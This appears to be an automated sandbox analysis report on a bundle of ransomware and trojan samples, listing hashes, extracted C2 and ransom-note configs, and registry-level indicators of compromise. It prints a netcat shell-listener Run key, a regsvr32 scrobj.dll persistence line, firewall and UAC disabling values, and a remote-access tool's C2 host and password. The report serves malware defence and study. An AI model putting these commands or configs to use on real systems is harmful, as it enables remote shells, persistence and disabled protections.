Analysis

max time kernel: 217s
max time network: 309s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-10-2024 16:00

Static task: static1
Behavioral task: behavioral1
Sample: RNSM00424.7z
Resource: win10v2004-20241007-en
General

Target: RNSM00424.7z
Size: 49.1MB
MD5: 336f8ae05e74a7e35bad8814d1c68b9c
SHA1: 582c5d7c2fb98d8dd2035a25971f2b45ecfb269a
SHA256: 9b85a4cc99fb037c9f4033d54fc9f857cc5a89a3da48b3deaf0697c02873b8f5
SHA512: b5e7591c8a005c3e80e4b1a3157ebb707be3dfca023bb9b063d395fa7536345616fae2868ce837420c71fdf44145a03627c18f24b4a9ad40959cd6b6e8a7a202
SSDEEP: 786432:YGuBiJAIDNGSOYHmWR1ZcbH4cflRHRju4boIidRxVIm3TcxcAJncrA1sai7XzKZW:YGdJAr/WR1ZasxHxumDcGSc03mXWZXxw
Malware Config

Extracted: cybergate v1.07.5
User
frankrat.no-ip.org:1604
3J717VQ3Q355I6
enable_keylogger: true
enable_message_box: false
ftp_directory: ./logs/
ftp_interval: 30
injected_process: explorer.exe
install_flag: false
keylogger_enable_ftp: false
message_box_caption: Remote Administration anywhere in the world.
message_box_title: CyberGate
password: frank123

Extracted (gandcrab): F:\$RECYCLE.BIN\S-1-5-21-4089630652-1596403869-279772308-1000\DKHMRCDXTJ-MANUAL.txt
http://gandcrabmfe6mnef.onion/11584738b93043c2

Extracted: C:\Recovery\WindowsRE\How To Restore Your Files.txt
http://gtmx56k4hutn3ikv.onion/blog/ff6b763849c49971c7ef8508064a3d8681529c7f45e532ff9e3d9ec13165263b/
http://gtmx56k4hutn3ikv.onion/
http://babukq4e2p4wu4iq.onion/login.php?id=l6Kr29xLbfnq1f0jzES55LLmmrZPd8

Extracted: C:\HOW-TO-DECRYPT-jjj9b.txt
http://o76s3m7l5ogig4u5.onion
Signatures

Babuk Locker
RaaS first seen in 2021, initially called Vasa Locker.

Babuk family

Clop family

Cybergate family

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.

Gandcrab family

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Set value (str): \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe" (process: Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe)

Modifies firewall policy service (3 TTPs, 2 IoCs)
Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile (process: Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe)
Set value (int): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" (process: Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe)

Modiloader family

Neshta
Malware from the Neshta family is designed to infect other files in order to spread itself and cause damage.

Neshta family

StormKitty
StormKitty is an open source info stealer written in C#.

StormKitty payload (3 IoCs)
behavioral1/memory/5656-3553-0x0000000000D90000-0x00000000011B0000-memory.dmp (family_stormkitty)
behavioral1/memory/5656-3562-0x0000000000D90000-0x00000000011B0000-memory.dmp (family_stormkitty)
behavioral1/memory/5656-4408-0x0000000000D90000-0x00000000011B0000-memory.dmp (family_stormkitty)

Stormkitty family

Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
PID 3064 created 1080: pid 3064, process taskmgr.exe, procid_target 157
PID 3064 created 1080: pid 3064, process taskmgr.exe, procid_target 157

Troldesh family

Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.

Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe)

clop
Ransomware discovered in early 2019 which has been actively developed since release.

behavioral1/files/0x0007000000023c98-323.dat (cryptone)

Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (process: UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe)
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (process: UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe)

ModiLoader Second Stage (2 IoCs)
behavioral1/memory/2516-196-0x0000000000400000-0x0000000000C2A000-memory.dmp (modiloader_stage2)
behavioral1/memory/1448-246-0x0000000000400000-0x0000000000C2A000-memory.dmp (modiloader_stage2)

Renames multiple (195) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Renames multiple (370) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid 8584: Powershell.exe

Disables RegEdit via registry modification (1 IoC)
Set value (int): \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (process: Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe)

Disables Task Manager via registry modification

Drops file in Drivers directory (2 IoCs)
File opened for modification: C:\Windows\system32\drivers\etc\hosts (process: Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe)
File created: C:\Windows\SysWOW64\drivers\gmreadme.txt (process: Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe)

Modifies Windows Firewall (2 TTPs, 1 IoC)
pid 3300: netsh.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (process: UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (process: UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe)

Checks computer location settings (2 TTPs, 12 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation hack.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control 
Panel\International\Geo\Nation key7.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe -
Credentials from Password Stores: Windows Credential Manager (1 TTP)
Suspicious access to Credentials History.

Drops startup file (3 IoCs)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DKHMRCDXTJ-MANUAL.txt (process: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\b930442fb93043ce713.lock (process: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DKHMRCDXTJ-MANUAL.txt (process: Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe)

Executes dropped EXE (60 IoCs)
pid Process 1712 HEUR-Trojan-Ransom.MSIL.Blocker.gen-388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52.exe 2184 HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe 2156 HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe 1088 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe 1484 HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe 1080 HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe 2520 HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 1064 Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 3200 ncarchive.rar.exe 2516 Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe 4444 Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe 1448 AdobeART.exe 3200 hack.exe 2852 Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe 4068 Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe 4020 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 1136 Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe 3920 
Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe 2860 Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe 216 Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe 2296 Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe 1080 Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe 1764 Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe 372 Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe 2128 Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe 4344 Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe 2432 Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 5728 ditziw.exe 6044 AVShieldPro.exe 5544 Trojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exe 1900 key7.exe 6348 key6.exe 7120 key6.exe 6104 UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe 6376 Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe 5536 rundll32.exe 6620 ditziw.exe 8248 UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe 9180 Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe 6232 UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe 4740 nc.exe 5068 Studio 2976 nc.exe 6848 ditziw.exe 5656 
VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe 6764 VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe 7780 ditziw.exe 7820 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe 5732 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe 5644 ditziw.exe 5832 ditziw.exe 6804 ditziw.exe 8384 ditziw.exe 7840 ditziw.exe 1968 ditziw.exe 8508 ditziw.exe -
Identifies Wine through registry keys (2 TTPs, 2 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Key opened: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine (process: UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe)
Key opened: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine (process: UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe)

Loads dropped DLL (29 IoCs)
pid Process 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 5728 ditziw.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 6620 ditziw.exe 6848 ditziw.exe 7780 ditziw.exe 5644 ditziw.exe 5832 ditziw.exe 6804 ditziw.exe 8384 ditziw.exe 7840 ditziw.exe 1968 ditziw.exe -
Modifies system executable filetype association (2 TTPs, 1 IoC)
Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" (process: HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe)

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Uses the VBS compiler for execution (1 TTP)

behavioral1/files/0x0007000000023c8c-183.dat (vmprotect)
behavioral1/memory/2516-196-0x0000000000400000-0x0000000000C2A000-memory.dmp (vmprotect)
behavioral1/memory/1448-246-0x0000000000400000-0x0000000000C2A000-memory.dmp (vmprotect)

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Key opened: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (process: VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe)
Key opened: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (process: VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe)
Key opened: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (process: VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe)

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 12 IoCs)
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cb41b96ff7da38575275b04b70b35012 = "regsvr32.exe /s /n /u /i:\"C:\\Users\\Admin\\AppData\\Roaming\\PO18PC84T2C.txt\" scrobj.dll." Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NC = "C:\\Users\\Admin\\AppData\\Local\\nc.exe -L -p 53 -e cmd.exe" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svechosts = "C:\\Users\\Admin\\AppData\\Roaming\\svechosts.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AdobeART = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeART.exe" AdobeART.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Registry Service = "C:\\Windows\\system32\\cmd.exe /c \"C:\\Users\\Admin\\AppData\\Local\\fuwswiqh.exe\"" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe" Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Updater = "C:\\Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Set value (str) 
\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Registry Service = "C:\\Windows\\system32\\cmd.exe /c \"C:\\Users\\Admin\\AppData\\Local\\fuwswiqh.exe\"" Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVShieldPro = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\AVShieldPro.exe" Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe" Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" Trojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Updater = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe -
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe)

Creates a large amount of network flows (1 TTP)
This may indicate a network scan to discover remotely running services.

Enumerates connected drives (3 TTPs, 64 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\B: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\H: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\G: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\U: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\P: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\A: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\S: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\H: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe 
